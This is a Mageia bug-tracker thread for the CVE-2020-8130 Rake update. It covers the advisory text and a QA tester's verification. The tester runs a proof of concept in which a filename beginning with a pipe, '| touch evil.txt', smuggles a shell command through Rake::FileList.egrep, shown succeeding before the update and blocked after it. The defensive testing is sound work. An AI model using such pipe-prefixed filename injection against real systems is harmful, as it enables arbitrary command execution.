Debian-LTS has issued an advisory on February 26: https://www.debian.org/lts/security/2020/dla-2120 The issue is fixed upstream in 12.3.3. Mageia 7 is also affected.
Status comment: (none) => Fixed upstream in 12.3.3Whiteboard: (none) => MGA7TOO
No registered nor recent maintainer, so assigning globally.
Assignee: bugsquad => pkg-bugs
CC: (none) => nicolas.salgueroAssignee: pkg-bugs => pterjanSource RPM: ruby-rake-12.3.0-22.mga8.src.rpm => ruby-2.7.0-26.mga8.src.rpm
ruby 2.7.0 contains 13.0.1 so it is fine in cauldron I will update ruby-rake in 7
Version: Cauldron => 7
Packages have been uploaded to 7/core/updates_testing: ruby-rake-12.3.0-21.mga7.src.rpm ruby-rake-12.3.0-21.mga7.noarch.rpm A simple exploit is available on https://hackerone.com/reports/651518
Advisory: ======================== Updated ruby-rake package fixes security vulnerability: There is an OS command injection vulnerability in Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|` (CVE-2020-8130). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130 https://www.debian.org/lts/security/2020/dla-2120
Source RPM: ruby-2.7.0-26.mga8.src.rpm => ruby-rake-12.3.0-20.mga7.src.rpmCC: (none) => pterjanStatus comment: Fixed upstream in 12.3.3 => (none)Assignee: pterjan => qa-bugsWhiteboard: MGA7TOO => (none)
mga7, x86_64 CVE-2020-8130 https://hackerone.com/reports/651518 $ cat poc_rake.rb #!/bin/ruby require 'rake' list = Rake::FileList.new( Dir.glob( '*' ) ) p list list.egrep( /something/ ) $ touch "| touch evil.txt" $ ls -1 poc_rake.rb report.26266 '| touch evil.txt' For this test I left out the bundling stuff because I have no real idea about enabling it. The script should work without it AFAICS. $ ruby poc_rake.rb ["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"] #report.26266#:10:list.egrep( /something/ ) report.26266:10:list.egrep( /something/ ) poc_rake.rb:6:list.egrep( /something/ ) $ ls -1 evil.txt poc_rake.rb '#report.26266#' report.26266 '| touch evil.txt' So evil.txt has been created. Updated the package and tested the exploit again. $ rm -f evil.txt $ ruby poc_rake.rb ["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"] #report.26266#:10:list.egrep( /something/ ) #report.26266#:21:#report.26266#:10:list.egrep( /something/ ) #report.26266#:22:report.26266:10:list.egrep( /something/ ) #report.26266#:23:poc_rake.rb:6:list.egrep( /something/ ) report.26266:10:list.egrep( /something/ ) poc_rake.rb:6:list.egrep( /something/ ) $ ls -1 poc_rake.rb '#report.26266#' report.26266 '| touch evil.txt' No more evil.txt. Copied files from /usr/share/gems/gems/rake-12.3.0/doc/example/ to a local directory and ran rake against Rakefile2. $ cat Rakefile2 # Example Rakefile -*- ruby -*- # Using the power of Ruby task :default => [:main] def ext(fn, newext) fn.sub(/\.[^.]+$/, newext) end SRCFILES = Dir['*.c'] OBJFILES = SRCFILES.collect { |fn| ext(fn,".o") } OBJFILES.each do |objfile| srcfile = ext(objfile, ".c") file objfile => [srcfile] do |t| sh "gcc #{srcfile} -c -o #{t.name}" end end file "main" => OBJFILES do |t| sh "gcc -o #{t.name} main.o a.o b.o" end task :clean do rm_f FileList['*.o'] Dir['*~'].each { |fn| rm_f fn } end task :clobber => [:clean] do rm_f "main" end task :run => ["main"] do sh "./main" end $ cp Rakefile2 Rakefile $ rake clean rm -f $ rake run gcc a.c -c -o a.o gcc main.c -c -o main.o gcc b.c -c -o b.o gcc -o main main.o a.o b.o ./main In function a In function b $ ls a.c b.o main.o Rakefile1 report.26266 a.o main* poc_rake.rb Rakefile2 '| touch evil.txt' b.c main.c Rakefile '#report.26266#' $ ./main In function a In function b $ rake clean rm -f a.o b.o main.o ruby-rake can do a lot more but this shows that the basic functions work.
CC: (none) => tarazed25Whiteboard: (none) => MGA7-64-OK
Could this be applied to political campaigns? Eliminating "evil.txt" there would be a Good Thing. For everybody. Validating. Advisory in Comment 4.
CC: (none) => andrewsfarm, sysadmin-bugsKeywords: (none) => validated_update
Keywords: (none) => advisoryCC: (none) => tmb
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0121.html
Status: NEW => RESOLVEDResolution: (none) => FIXED